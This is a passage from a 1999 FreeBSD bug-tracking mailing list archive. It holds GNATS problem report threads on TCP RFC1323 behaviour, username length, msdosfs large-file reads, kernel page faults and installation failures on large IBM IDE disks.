kern/1689; it has been noted by GNATS. From: Jonathan Lemon To: Garrett Wollman Cc: Sheldon Hearn , freebsd-gnats-submit@freebsd.org Subject: Re: kern/1689: TCP extensions throttles distant connections Date: Wed, 22 Dec 1999 17:30:59 -0600 I haven't been able to reproduce this here. Between two -current boxes: net.inet.tcp.rfc1323 = 1 on both machines, net.inet.tcp.delayed_ack = 1 on both machines, On one machine: ipfw pipe 1 config bw 128kbit/s delay 200ms ipfw add pipe 1 ip from hostA to hostB out ipfw add pipe 1 ip from hostB to hostA in This gives: recvpipe sendpipe ssthresh rtt,msec rttvar hopcount mtu expire 0 0 0 400 3 0 1500 1012 E.g.: a 400ms round trip time. I don't see any abnormal delays in connections between the two machines. Is there something else I'm missing here, or is the problem gone in -current? -- Jonathan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 16:11:25 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from sonet.crimea.ua (OTC-sl3-FLY.CRIS.NET [212.110.136.71]) by hub.freebsd.org (Postfix) with ESMTP id 82D3614DB8 for ; Wed, 22 Dec 1999 16:11:19 -0800 (PST) (envelope-from phantom@scorpion.crimea.ua) Received: (from uucp@localhost) by sonet.crimea.ua (8.9.3/8.9.3) with UUCP id CAA25107; Thu, 23 Dec 1999 02:17:33 +0300 (MSK) Received: (from phantom@localhost) by scorpion.crimea.ua (8.8.8/8.8.5+ssl+keepalive) id BAA22144; Thu, 23 Dec 1999 01:51:53 +0300 (MSK) Date: Thu, 23 Dec 1999 01:51:53 +0300 From: Alexey Zelkin To: Kurt Jaeger Cc: pi@LF.net, freebsd-bugs@FreeBSD.ORG Subject: Re: misc/13152: systemwide username too short (currently 16 char, should be 64 or so) Message-ID: <19991223015153.C19952@scorpion.crimea.ua> References: <199912201708.JAA34641@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.7i In-Reply-To: X-Operating-System: FreeBSD 2.2.7-RELEASE i386 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi, On Wed, Dec 22, 1999 at 07:10:55PM +0100, Kurt Jaeger wrote: > > Synopsis: systemwide username too short (currently 16 char, should be 64 or so) > > > State-Changed-From-To: open->closed > > State-Changed-By: phantom > > State-Changed-When: Mon Dec 20 09:04:53 PST 1999 > > State-Changed-Why: > > You did not provide any real example. My experience shown that 16 chars is *really* > > enough. Anyway aliases(5) is your friend. > > My goal is it to set up a system that allows user-allocated (!) usernames > for many different domains on one physical system. > > For this to work, I set up a scheme that allows something like > > user+domain > > as username. Are you sure that it's impossible to do with NIS ? > With the 16 chars limit, this failes very soon for domains longer than > a few characters. > > This was the reason I asked for 64 chars. Hmm... Don't you think that it should be *great* overhead in standalone installation (proc, [uw]tmp, etc. etc. etc.) ? > Aliases are nice for single/few-domain setups, not for systems with > >>1000 domains on one system. Reason: collissions when selecting > the "local" part of an account. > > I still think this should be part of Fbsd. It's part of FreeBSD. It's possible to define user name length as long as you need, but it's not need for everyone. -- /* Alexey Zelkin && phantom@cris.net */ /* Tavric National University && phantom@crimea.edu */ /* http://www.ccssu.crimea.ua/~phantom && phantom@FreeBSD.org */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 17:10: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D382214E88 for ; Wed, 22 Dec 1999 17:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA61554; Wed, 22 Dec 1999 17:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Wed, 22 Dec 1999 17:10:01 -0800 (PST) Message-Id: <199912230110.RAA61554@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Garrett Wollman Subject: Re: kern/1689: TCP extensions throttles distant connections Reply-To: Garrett Wollman Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/1689; it has been noted by GNATS. From: Garrett Wollman To: Jonathan Lemon Cc: Garrett Wollman , Sheldon Hearn , freebsd-gnats-submit@freebsd.org Subject: Re: kern/1689: TCP extensions throttles distant connections Date: Wed, 22 Dec 1999 20:05:10 -0500 (EST) < said: > I don't see any abnormal delays in connections between the two > machines. Is there something else I'm missing here, or is the > problem gone in -current? There are two things you're missing (but neither is your fault): 1) Some broken terminal servers (most of which have hopefully been retired) have bad VJ header compression code which trashes TCP segments containing unknown-to-them TCP options. 2) RFC1323 timestamps effectively disable VJ header compression. Arguably, this is not a real-life problem, but for the lack of a dynamic mechanism to control use of RFC 1323 (on a per-destination basis). (1), and not this PR, is the actual reason why RFC 1323 was turned off by default. I'm no longer concerned about it myself and have turned it back on on all of my machines. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 18:13:33 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 33BAA14DCB; Wed, 22 Dec 1999 18:13:31 -0800 (PST) (envelope-from alfred@FreeBSD.org) Received: (from alfred@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA66420; Wed, 22 Dec 1999 18:13:30 -0800 (PST) (envelope-from alfred@FreeBSD.org) Date: Wed, 22 Dec 1999 18:13:30 -0800 (PST) From: Message-Id: <199912230213.SAA66420@freefall.freebsd.org> To: assar@stacken.kth.se, alfred@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/15452: getfh syscall is only installed with NFS Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: getfh syscall is only installed with NFS State-Changed-From-To: open->closed State-Changed-By: alfred State-Changed-When: Wed Dec 22 18:10:59 PST 1999 State-Changed-Why: diffs applied in to -current 1.69 +2 -2 src/sys/kern/syscalls.master 1.88 +1 -15 src/sys/nfs/nfs_subs.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 21:40: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8799314E7A for ; Wed, 22 Dec 1999 21:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA80065; Wed, 22 Dec 1999 21:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id BFE3614D30; Wed, 22 Dec 1999 21:30:04 -0800 (PST) Message-Id: <19991223053004.BFE3614D30@hub.freebsd.org> Date: Wed, 22 Dec 1999 21:30:04 -0800 (PST) From: kientzle@acm.org To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: kern/15639: msdosfs can't read large (3.8gig) files Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15639 >Category: kern >Synopsis: msdosfs can't read large (3.8gig) files >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Dec 22 21:40:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Tim Kientzle >Release: 3.3-RELEASE >Organization: >Environment: FreeBSD clover.kientzle.com 3.3-RELEASE FreeBSD 3.3-RELEASE #1: Tue Oct 12 16:52:34 PDT 1999 root@clover.kientzle.com:/usr/src/sys/compile/CLOVER i386 >Description: How to transfer a 3.8gig file from a distant Windows computer to a FreeBSD machine? I have a (fairly important) file sent me on a Windows-formatted hard disk. When I 'mount_msdos /dev/wd3s1' and then try to 'cp /mnt/BigFile.avi /usr/tmp', I end up with a 0-byte file in /usr/tmp. >How-To-Repeat: >Fix: Note: if some knowledgable soul can give me pointers to likely culprits in the msdosfs code, I'd happily experiment. This is a very important file, and I need to access it very soon. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 22 22:21: 7 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D9F1C14FC0; Wed, 22 Dec 1999 22:21:05 -0800 (PST) (envelope-from jkh@FreeBSD.org) Received: (from jkh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id WAA82258; Wed, 22 Dec 1999 22:21:05 -0800 (PST) (envelope-from jkh@FreeBSD.org) Date: Wed, 22 Dec 1999 22:21:05 -0800 (PST) From: Message-Id: <199912230621.WAA82258@freefall.freebsd.org> To: cpeterso@cs.washington.edu, jkh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/11289: makeflp.bat suggestion: create "kernel" disk after "mfsroot" disk, so user doesn't have to swap disks twice. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: makeflp.bat suggestion: create "kernel" disk after "mfsroot" disk, so user doesn't have to swap disks twice. State-Changed-From-To: open->closed State-Changed-By: jkh State-Changed-When: Wed Dec 22 22:18:44 PST 1999 State-Changed-Why: Good point. :) Done, but a bit too late for 3.4. It will be in the 3.5 CD's makeflp.bat file. I've also removed the double-return requirement while I was at it. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 23 1: 9:37 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8AFBF14C33; Thu, 23 Dec 1999 01:09:36 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA94037; Thu, 23 Dec 1999 01:09:36 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Date: Thu, 23 Dec 1999 01:09:36 -0800 (PST) From: Message-Id: <199912230909.BAA94037@freefall.freebsd.org> To: sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org, adrian@FreeBSD.org Subject: Re: bin/2258: route add/delete [network] xxx.yyy.zzz.0 my-IP Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: route add/delete [network] xxx.yyy.zzz.0 my-IP Responsible-Changed-From-To: freebsd-bugs->adrian Responsible-Changed-By: sheldonh Responsible-Changed-When: Thu Dec 23 01:09:07 PST 1999 Responsible-Changed-Why: Ha! A victim. Adrian's offered to look at this. :-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 23 1:20: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D6E7114CFB for ; Thu, 23 Dec 1999 01:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA94583; Thu, 23 Dec 1999 01:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 23 Dec 1999 01:20:01 -0800 (PST) Message-Id: <199912230920.BAA94583@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Sheldon Hearn Subject: Re: kern/1689: TCP extensions throttles distant connections Reply-To: Sheldon Hearn Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/1689; it has been noted by GNATS. From: Sheldon Hearn To: Garrett Wollman Cc: Jonathan Lemon , freebsd-gnats-submit@freebsd.org Subject: Re: kern/1689: TCP extensions throttles distant connections Date: Thu, 23 Dec 1999 11:14:15 +0200 On Wed, 22 Dec 1999 20:05:10 EST, Garrett Wollman wrote: > I'm no longer concerned about it myself and have turned > it back on on all of my machines. But you still want this PR open? I'm getting confused. :-) Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 23 2:10:12 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 12E2314FDD for ; Thu, 23 Dec 1999 02:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA99588; Thu, 23 Dec 1999 02:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id C45B3150A7; Thu, 23 Dec 1999 02:05:37 -0800 (PST) Message-Id: <19991223100537.C45B3150A7@hub.freebsd.org> Date: Thu, 23 Dec 1999 02:05:37 -0800 (PST) From: mur@lynx.ru To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: kern/15644: Fatal trap 12: page fault while in kernel mode on 2.2-stable Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15644 >Category: kern >Synopsis: Fatal trap 12: page fault while in kernel mode on 2.2-stable >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Dec 23 02:10:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Ilya V. Komarov >Release: 2.2-stable >Organization: Lynx >Environment: FreeBSD nethub.lynx.ru 2.2.8-STABLE FreeBSD 2.2.8-STABLE #0: Fri Nov 26 21:35:15 MSK 1999 root@nethub.lynx.ru:/usr/src/sys/compile/NS i386 >Description: spontaneous exit to kernel debuger with message: ___________________________________________________________________________________________ Nov 27 13:37:49 nethub /kernel: Fatal trap 12: page fault while in kernel mode Nov 27 13:37:50 nethub /kernel: fault virtual address = 0xf0f55005 Nov 27 13:37:50 nethub /kernel: fault code = supervisor read, page not present Nov 27 13:37:50 nethub /kernel: instruction pointer = 0x8:0xf6ae07e5 Nov 27 13:37:50 nethub /kernel: stack pointer = 0x10:0xf020cce0 Nov 27 13:37:51 nethub /kernel: frame pointer = 0x10:0xf020cd0c Nov 27 13:37:51 nethub /kernel: code segment = base 0x0, limit 0xfffff, type 0x1b Nov 27 13:37:51 nethub /kernel: = DPL 0, pres 1, def32 1, gran 1 Nov 27 13:37:51 nethub /kernel: processor eflags = interrupt enabled, resume, IOPL = 0 Nov 27 13:37:51 nethub /kernel: current process = Idle Nov 27 13:37:52 nethub /kernel: interrupt mask = Nov 27 13:37:52 nethub /kernel: Nov 27 13:37:52 nethub /kernel: ________________________________________________________________________ sometimes 'continue' command in KDB solve problem, sometimes only system reboot. >How-To-Repeat: non-periodic, ~ 1 in two weeks. make world each month can't fix this bug. >Fix: can't fix. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 23 2:53:10 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 25E9F15579; Thu, 23 Dec 1999 02:53:09 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA03124; Thu, 23 Dec 1999 02:53:09 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Date: Thu, 23 Dec 1999 02:53:09 -0800 (PST) From: Message-Id: <199912231053.CAA03124@freefall.freebsd.org> To: cheiser@cais.net, sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/15635: FreeBSD 3.4 Installation caught signal 11 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: FreeBSD 3.4 Installation caught signal 11 State-Changed-From-To: open->closed State-Changed-By: sheldonh State-Changed-When: Thu Dec 23 02:51:33 PST 1999 State-Changed-Why: This is a known problem, covered in the online ERRATA at: ftp://ftp.FreeBSD.org/pub/FreeBSD/releases/i386/3.4-RELEASE/ERRATA.TXT To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 23 3: 0: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id EDE5B156FF for ; Thu, 23 Dec 1999 03:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA03746; Thu, 23 Dec 1999 03:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 23 Dec 1999 03:00:02 -0800 (PST) Message-Id: <199912231100.DAA03746@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Sheldon Hearn Subject: Re: i386/15631: 3.4 won't install with IBM 37.5 gb disks Reply-To: Sheldon Hearn Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR i386/15631; it has been noted by GNATS. From: Sheldon Hearn To: rec@RCousins.com Cc: freebsd-gnats-submit@FreeBSD.ORG, sos@FreeBSD.org Subject: Re: i386/15631: 3.4 won't install with IBM 37.5 gb disks Date: Thu, 23 Dec 1999 12:52:39 +0200 On Wed, 22 Dec 1999 10:39:42 PST, rec@RCousins.com wrote: > I will lend the disk to a developer or contribute money to buy one. > I just want the bug(s) fixed. That's a kind offer, and one that the wd driver's maintainer might take you up on, but let's cover some basics first. :-) > The installation dies as soon as it build the filesystems and begins > to copy files onto the disk. When you say it dies, what do you mean? Does the entire system lock up and become unresponsive to attempts to switch virtual terminals? Do any error messages come up on any of the virtual terminals? Does the machine reboot spontaneously? > Take any machine with an IBM 37.5 gb IDE disk as the primary system > disk and perform the install from floppy. Did you have any other operating system on the disk? I know you said it was new, but you might have meant age, rather than use. If so, how was the disk partitioned when you started? How did you partition and label the disk? Can you copy down the kernel boot probe messages that were displayed for your wdc controller and wd devices? Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 23 9:40: 7 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 52DDA1592A for ; Thu, 23 Dec 1999 09:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA98853; Thu, 23 Dec 1999 09:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 23 Dec 1999 09:40:02 -0800 (PST) Message-Id: <199912231740.JAA98853@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Robert Cousins Subject: Re: i386/15631: 3.4 won't install with IBM 37.5 gb disks Reply-To: Robert Cousins Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR i386/15631; it has been noted by GNATS. From: Robert Cousins To: Sheldon Hearn Cc: Subject: Re: i386/15631: 3.4 won't install with IBM 37.5 gb disks Date: Thu, 23 Dec 1999 09:30:20 -0800 This is a cryptographically signed message in MIME format. --------------ms1BF653F8AA93291B9B8A3587 Content-Type: multipart/mixed; boundary="------------87D7B7BEF54C2D8099EBB454" This is a multi-part message in MIME format. --------------87D7B7BEF54C2D8099EBB454 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sheldon: Wow! Fast response! Even at Christmas time! I'll try to answer your questions below. I can't answer all of them at this instant but I'll give you what I can. Sheldon Hearn wrote: > > On Wed, 22 Dec 1999 10:39:42 PST, rec@RCousins.com wrote: > > > I will lend the disk to a developer or contribute money to buy one. > > I just want the bug(s) fixed. > > That's a kind offer, and one that the wd driver's maintainer might take > you up on, but let's cover some basics first. :-) > > > The installation dies as soon as it build the filesystems and begins > > to copy files onto the disk. > > When you say it dies, what do you mean? Does the entire system lock up > and become unresponsive to attempts to switch virtual terminals? Do any > error messages come up on any of the virtual terminals? Does the > machine reboot spontaneously? The system panics with a "corrupt I-node" message and then reboots. > > Take any machine with an IBM 37.5 gb IDE disk as the primary system > > disk and perform the install from floppy. > > Did you have any other operating system on the disk? I know you said it > was new, but you might have meant age, rather than use. If so, how was > the disk partitioned when you started? No other OS. I had dedicated the entire disk to FreeBSD ("dangerously dedicated" in the terms of the installation). > How did you partition and label the disk? I used the "custom" install option from the boot floppies. I had then selected the disk, dedicated the entire thing to FreeBSD, made it dangerously dedicated and then allocated swap, /, /var and /usr file systems. (Also bumped into a bug in the install program whereby it won't let you use the last 50 megabytes of the disk in some situations.) > Can you copy down the kernel boot probe messages that were displayed for > your wdc controller and wd devices? Don't have them anymore. I'll try to reproduce them tonight or tomorrow. > Ciao, > Sheldon. My theory (as an old device driver writer) is that there is something of a problem accessing the disk past 32 gb. As a result, the driver thinks it is talking to the top few gigabytes but in reality has "wrapped around" to the bottom of the disk. This is supported by the behavior when I don't use the 0xb0ffb0ff flags for the driver. Then newfs can work perfectly but the first attempt to copy data to the disk causes a panic. Please let me know how else I can help. Thanx --------------87D7B7BEF54C2D8099EBB454 Content-Type: text/x-vcard; charset=us-ascii; name="rec.vcf" Content-Transfer-Encoding: 7bit Content-Description: Card for Robert Cousins Content-Disposition: attachment; filename="rec.vcf" begin:vcard n:Cousins;Robert tel;fax:(408) 867-6956 tel;home:(408) 867-4237 tel;work:(408) 867-4237 x-mozilla-html:FALSE url:http://www.rcousins.com/rec org:Cousins Consulting adr:;;14330 Cordwood Court;Saratoga;California;95070;USA version:2.1 email;internet:rec@RCousins.com title:Principal x-mozilla-cpt:;20048 fn:Robert Cousins end:vcard --------------87D7B7BEF54C2D8099EBB454-- --------------ms1BF653F8AA93291B9B8A3587 Content-Type: application/x-pkcs7-signature; name="smime.p7s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="smime.p7s" Content-Description: S/MIME Cryptographic Signature MIIJ7AYJKoZIhvcNAQcCoIIJ3TCCCdkCAQExCzAJBgUrDgMCGgUAMAsGCSqGSIb3DQEHAaCC B+4wggS4MIIEIaADAgECAhAz36ad4dszDO5FXZmtFHrQMA0GCSqGSIb3DQEBBAUAMIHMMRcw FQYDVQQKEw5WZXJpU2lnbiwgSW5jLjEfMB0GA1UECxMWVmVyaVNpZ24gVHJ1c3QgTmV0d29y azFGMEQGA1UECxM9d3d3LnZlcmlzaWduLmNvbS9yZXBvc2l0b3J5L1JQQSBJbmNvcnAuIEJ5 IFJlZi4sTElBQi5MVEQoYyk5ODFIMEYGA1UEAxM/VmVyaVNpZ24gQ2xhc3MgMSBDQSBJbmRp dmlkdWFsIFN1YnNjcmliZXItUGVyc29uYSBOb3QgVmFsaWRhdGVkMB4XDTk5MDIxNzAwMDAw MFoXDTAwMDIxNzIzNTk1OVowggEUMRcwFQYDVQQKEw5WZXJpU2lnbiwgSW5jLjEfMB0GA1UE CxMWVmVyaVNpZ24gVHJ1c3QgTmV0d29yazFGMEQGA1UECxM9d3d3LnZlcmlzaWduLmNvbS9y ZXBvc2l0b3J5L1JQQSBJbmNvcnAuIGJ5IFJlZi4sTElBQi5MVEQoYyk5ODEeMBwGA1UECxMV UGVyc29uYSBOb3QgVmFsaWRhdGVkMTMwMQYDVQQLEypEaWdpdGFsIElEIENsYXNzIDEgLSBO ZXRzY2FwZSBGdWxsIFNlcnZpY2UxGjAYBgNVBAMUEVJvYmVydCBFLiBDb3VzaW5zMR8wHQYJ KoZIhvcNAQkBFhByZWNAcmNvdXNpbnMuY29tMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANpj 71VzaVM1lTYLHlapmSWkzw+If7rncnv9+gZ+tGMEzO5eBD5PhW6/jOXNBsA5DDAVZhisura7 SoshB2IH9iUCAwEAAaOCAZIwggGOMAkGA1UdEwQCMAAwga8GA1UdIASBpzCAMIAGC2CGSAGG +EUBBwEBMIAwKAYIKwYBBQUHAgEWHGh0dHBzOi8vd3d3LnZlcmlzaWduLmNvbS9DUFMwYgYI KwYBBQUHAgIwVjAVFg5WZXJpU2lnbiwgSW5jLjADAgEBGj1WZXJpU2lnbidzIENQUyBpbmNv cnAuIGJ5IHJlZmVyZW5jZSBsaWFiLiBsdGQuIChjKTk3IFZlcmlTaWduAAAAAAAAMBEGCWCG SAGG+EIBAQQEAwIHgDCBhgYKYIZIAYb4RQEGAwR4FnZkNDY1MmJkNjNmMjA0NzAyOTI5ODc2 M2M5ZDJmMjc1MDY5YzczNTliZWQxYjA1OWRhNzViYzRiYzk3MDE3NDdkYTVkM2YyMTQxYmVh ZGIyYmQyZTg5MjFmYTg2YmY2ZDcxMTQ5OWFhM2JlNDRmY2YzZWE0NTBjMDMGA1UdHwQsMCow KKAmoCSGImh0dHA6Ly9jcmwudmVyaXNpZ24uY29tL2NsYXNzMS5jcmwwDQYJKoZIhvcNAQEE BQADgYEAswimlbKQ4BbURbh6VjfSubIlDwGsOrDCfkO7+FaX1QFieLWJuvjI+b3TFkv0lxWb MndRV0rGUOqlkbp/ndNZ2LW7zYaCeia++qh1JRLUdR2aT1F/0+9PaFNN1w8IRXixb4iIcGrJ bU2Q3w0t2nc6I/Q0zRzWMDItnXMOcNkb13swggMuMIICl6ADAgECAhEA0nYujRQMPX2yqCVd r+4NdTANBgkqhkiG9w0BAQIFADBfMQswCQYDVQQGEwJVUzEXMBUGA1UEChMOVmVyaVNpZ24s IEluYy4xNzA1BgNVBAsTLkNsYXNzIDEgUHVibGljIFByaW1hcnkgQ2VydGlmaWNhdGlvbiBB dXRob3JpdHkwHhcNOTgwNTEyMDAwMDAwWhcNMDgwNTEyMjM1OTU5WjCBzDEXMBUGA1UEChMO VmVyaVNpZ24sIEluYy4xHzAdBgNVBAsTFlZlcmlTaWduIFRydXN0IE5ldHdvcmsxRjBEBgNV BAsTPXd3dy52ZXJpc2lnbi5jb20vcmVwb3NpdG9yeS9SUEEgSW5jb3JwLiBCeSBSZWYuLExJ QUIuTFREKGMpOTgxSDBGBgNVBAMTP1ZlcmlTaWduIENsYXNzIDEgQ0EgSW5kaXZpZHVhbCBT dWJzY3JpYmVyLVBlcnNvbmEgTm90IFZhbGlkYXRlZDCBnzANBgkqhkiG9w0BAQEFAAOBjQAw gYkCgYEAu1pEigQWu1X9A3qKLZRPFXg2uA1Ksm+cVL+86HcqnbnwaLuV2TFBcHqBS7lIE1Yt xwjhhEKrwKKSq0RcqkLwgg4C6S/7wju7vsknCl22sDZCM7VuVIhPh0q/Gdr5FegPh7Yc48zG mo5/aiSS4/zgZbqnsX7vyds3ashKyAkG5JkCAwEAAaN8MHowEQYJYIZIAYb4QgEBBAQDAgEG MEcGA1UdIARAMD4wPAYLYIZIAYb4RQEHAQEwLTArBggrBgEFBQcCARYfd3d3LnZlcmlzaWdu LmNvbS9yZXBvc2l0b3J5L1JQQTAPBgNVHRMECDAGAQH/AgEAMAsGA1UdDwQEAwIBBjANBgkq hkiG9w0BAQIFAAOBgQCIuDc73dqUNwCtqp/hgQFxHpJqbS/28Z3TymQ43BuYDAeGW4UVag+5 SYWklfEXfWe0fy0s3ZpCnsM+tI6q5QsG3vJWKvozx74Z11NMw73I4xe1pElCY+zCphcPXVga STyQXFWjZSAA/Rgg5V+CprGoksVYasGNAzzrw80FopCubjGCAcYwggHCAgEBMIHhMIHMMRcw FQYDVQQKEw5WZXJpU2lnbiwgSW5jLjEfMB0GA1UECxMWVmVyaVNpZ24gVHJ1c3QgTmV0d29y azFGMEQGA1UECxM9d3d3LnZlcmlzaWduLmNvbS9yZXBvc2l0b3J5L1JQQSBJbmNvcnAuIEJ5 IFJlZi4sTElBQi5MVEQoYyk5ODFIMEYGA1UEAxM/VmVyaVNpZ24gQ2xhc3MgMSBDQSBJbmRp dmlkdWFsIFN1YnNjcmliZXItUGVyc29uYSBOb3QgVmFsaWRhdGVkAhAz36ad4dszDO5FXZmt FHrQMAkGBSsOAwIaBQCgfTAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3DQEJ BTEPFw05OTEyMjMxNzMwMjFaMB4GCSqGSIb3DQEJDzERMA8wDQYIKoZIhvcNAwICASgwIwYJ KoZIhvcNAQkEMRYEFDrhcqJqQkMgK4CmUxFfFwgm9MriMA0GCSqGSIb3DQEBAQUABEDJKokb VpSV8xYQdT2WXN8uZrlS5pMUgMNQmmd94rc3fauuAqHwBATpBzg94Um/S+Iek3K0Y9qMFHSq B83iNehS --------------ms1BF653F8AA93291B9B8A3587-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe 